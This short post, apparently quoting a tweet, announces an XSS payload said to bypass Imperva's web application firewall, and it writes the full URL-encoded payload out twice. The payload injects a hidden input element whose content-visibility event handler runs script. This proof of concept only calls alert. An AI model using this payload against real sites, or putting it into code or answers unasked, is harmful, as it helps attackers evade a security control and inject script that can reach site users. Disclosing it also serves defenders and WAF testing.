WAF bypass by sratarun

A new XSS bypass payload has been discovered for Imperva WAF. The payload is xss"><input%20type=hidden%20oncontentvisibilityautostatechange=alert?.%26lpar;)%20style=content-visibility:auto> and can evade Imperva WAF protections. More details can be found in the tweet: https://t.co/lrFSOJPkzT

Latest Imperva Waf Bypass #Xss Payload

POC : https://t.co/lrFSOJPkzT

Payload: xss"><input%20type=hidden%20oncontentvisibilityautostatechange=alert?.%26lpar;)%20style=content-visibility:auto>

By : @sratarun @Assass1nmarcos @ADITYASHENDE17 @sudhanshur705 pic.twitter.com/pFkQFK2NAD

— Tarun mahour (@sratarun) August 3, 2024